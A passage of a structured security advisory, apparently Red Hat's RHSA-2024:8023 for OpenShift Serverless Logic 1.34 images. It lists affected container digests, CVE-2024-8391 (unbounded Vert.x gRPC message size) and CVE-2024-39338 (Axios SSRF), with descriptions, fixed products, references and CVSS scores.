"openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", }, product_reference: "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", }, product_reference: "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", }, product_reference: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", }, product_reference: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", }, product_reference: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", }, product_reference: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", }, product_reference: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", }, product_reference: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, ], }, vulnerabilities: [ { cve: "CVE-2024-8391", cwe: { id: "CWE-770", name: "Allocation of Resources Without Limits or Throttling", }, discovery_date: "2024-09-04T16:20:44.762419+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2309758", }, ], notes: [ { category: "description", text: "A flaw was found in the gRPC server in Eclipse Vert.x, which does not limit the maximum length of the message payload. This may lead to excessive memory consumption in a server or a client, causing a denial of service.", title: "Vulnerability description", }, { category: "summary", text: "io.vertx:vertx-grpc-client: io.vertx:vertx-grpc-server: Vertx gRPC server does not limit the maximum message size", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-8391", }, { category: "external", summary: "RHBZ#2309758", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309758", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-8391", url: "https://www.cve.org/CVERecord?id=CVE-2024-8391", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-8391", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-8391", }, { category: "external", summary: "https://github.com/eclipse-vertx/vertx-grpc/issues/113", url: "https://github.com/eclipse-vertx/vertx-grpc/issues/113", }, { category: "external", summary: "https://gitlab.eclipse.org/security/cve-assignement/-/issues/31", url: "https://gitlab.eclipse.org/security/cve-assignement/-/issues/31", }, ], release_date: "2024-09-04T16:15:09.253000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-14T00:59:58+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8023", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "io.vertx:vertx-grpc-client: io.vertx:vertx-grpc-server: Vertx gRPC server does not limit the maximum message size", }, { cve: "CVE-2024-39338", cwe: { id: "CWE-918", name: "Server-Side Request Forgery (SSRF)", }, discovery_date: "2024-08-13T17:21:32.774718+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2304369", }, ], notes: [ { category: "description", text: "A vulnerability was found in the Axios HTTP Client. It is vulnerable to a server-side request forgery attack (SSRF) caused by unexpected behavior where requests for path-relative URLs get processed as protocol-relative URLs. This flaw allows an attacker to perform arbitrary requests from the server, potentially accessing internal systems or exfiltrating sensitive data.", title: "Vulnerability description", }, { category: "summary", text: "axios: axios: Server-Side Request Forgery", title: "Vulnerability summary", }, { category: "other", text: "This vulnerability is rated as IMPORTANT because it can be exploited remotely with low complexity and without user interaction, it poses a significant risk to confidentiality.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", 